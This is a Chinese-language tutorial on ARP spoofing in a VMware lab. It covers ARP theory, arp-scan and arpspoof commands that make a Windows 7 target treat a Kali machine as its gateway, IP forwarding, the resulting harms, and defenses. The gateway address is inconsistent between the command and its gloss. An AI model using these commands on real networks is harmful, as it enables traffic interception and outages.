目錄

一、環(huán)境

二、arp欺騙原理

三、arp欺騙操作

四、arp欺騙的危害

五、arp欺騙的防御

---

一、環(huán)境

VMware下的kali（攻擊機(jī)）、Windows 7 x64（目標(biāo)機(jī)）

kali下載鏈接：

https://blog.csdn.net/Stupid__Angel/article/details/125939197

Windows 7 x64鏡像下載鏈接：

鏈接：https://pan.baidu.com/s/1dvZgIOi1zWBzqXM-EJgZ7A?pwd=abcd?
提取碼：abcd?
--來(lái)自百度網(wǎng)盤超級(jí)會(huì)員V1的分享

二、arp欺騙原理

什么ARP：地址解析協(xié)議（Address Resolution Protocol）

作用：根據(jù)IP地址解析獲取MAC地址

為什么需要MAC地址：

1、MAC地址在封裝時(shí)是鏈路層封裝的尋址的地址

2、交換機(jī)（二層）通過(guò)MAC地址分發(fā)數(shù)據(jù)包

參考知識(shí)：數(shù)據(jù)封裝、數(shù)據(jù)分用

ARP協(xié)議實(shí)現(xiàn)特點(diǎn)：

1、ARP協(xié)議特點(diǎn)：無(wú)狀態(tài)，無(wú)需請(qǐng)求可以應(yīng)答

2、ARP實(shí)現(xiàn)：ARP緩存,動(dòng)態(tài)即時(shí)刷新

三、arp欺騙操作

1、在Windows 7 x64的cmd中輸入ipconfig /all ，查看其網(wǎng)關(guān)和IP

2、再輸入arp -a ，查看ip與mac的對(duì)照表

?3、打開kali，輸入sudo su 進(jìn)入root用戶，輸入ifconfig查看自己的ip

4、輸入arp-scan 192.168.230.1-192.168.230.254 查看是否與目標(biāo)機(jī)在同一網(wǎng)段下

5、輸入arpspoof -i eth0 -t 192.168.230.24 192.168.230.2 ，表示對(duì)目標(biāo)機(jī)，偽裝成其網(wǎng)關(guān)：

（發(fā)起攻擊網(wǎng)絡(luò)端口 eth0,攻擊目標(biāo)：192.168.230.24，攻擊目標(biāo)所在網(wǎng)關(guān)：192.168.190.2（虛擬機(jī)網(wǎng)關(guān)））

6、查看目標(biāo)機(jī)（Windows 7 x64）的arp是否已經(jīng)變化，由圖可知其網(wǎng)關(guān)的mac地址已經(jīng)變化成了kali的mac地址：

7、echo 1 > /proc/sys/net/ipv4/ip_forward （是改變ip轉(zhuǎn)發(fā)的，1是使目標(biāo)機(jī)能連外網(wǎng)）

四、arp欺騙的危害

1、ARP欺騙的危害-中間人攻擊

2、ARP欺騙的危害-終端斷網(wǎng)

原理：發(fā)送虛假ARP應(yīng)答使得網(wǎng)絡(luò)中的計(jì)算機(jī)終端ARP緩存混亂，從而無(wú)法與其他計(jì)算機(jī)通信

實(shí)現(xiàn)方式（工具）： arpspoof

五、arp欺騙的防御

1、使用靜態(tài)ARP緩存

2、使用三層交換設(shè)備

3、IP 與MAC地址綁定

4、ARP防御工具

總結(jié)

以上是生活随笔為你收集整理的ARP欺骗-教程详解的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。